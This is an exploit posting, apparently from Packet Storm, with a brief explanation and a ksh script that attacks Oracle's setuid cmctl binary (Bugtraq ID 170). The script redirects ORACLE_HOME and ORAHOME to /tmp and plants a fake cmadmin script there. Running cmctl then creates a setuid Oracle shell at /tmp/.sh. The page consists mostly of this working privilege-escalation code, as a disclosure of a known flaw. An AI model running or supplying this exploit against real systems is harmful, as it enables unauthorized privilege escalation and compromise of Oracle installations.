This script is an exploit that is an addendum to ID 170 in the Bugtraq database. ID 170 lists several Oracle setuid executables but does not offer any exploit information. This code exploits the cmctl command by violating its trust in the integrity of the ORACLE_HOME and ORA_HOME environment variables. When the command "cmctl start cmadmin" is executed, it looks under the ORACLE_HOME\bin directory and attempts to execute cmadmin. The ORACLE_HOME variable can be modified to create a change in the path of execution.
baabf3683d5e3e05e4139396752c7d9eb51dcf6e6f61509565b5d8a451188910#! /usr/bin/ksh
#############################################
#
# cmctl is installed setuid to Oracle
# by default. See BugTraq ID 170 and Oracle
# bug id 701297 and 714293.
#
# This script will create a setuid Oracle shell,
# /tmp/.sh
#
# redirect environment variables
export ORACLE_HOME=/tmp
export ORAHOME=/tmp
mkdir /tmp/bin
chmod a+rx /tmp/bin
# create cmadmin script
cat <<EOF > /tmp/bin/cmadmin
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
chmod a+rx /tmp/.sh
EOF
chmod a+rx /tmp/bin/cmadmin
# run cmctl to crete Oracle setuid shell
/oracle/products/V815/bin/cmctl start cmadmin
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed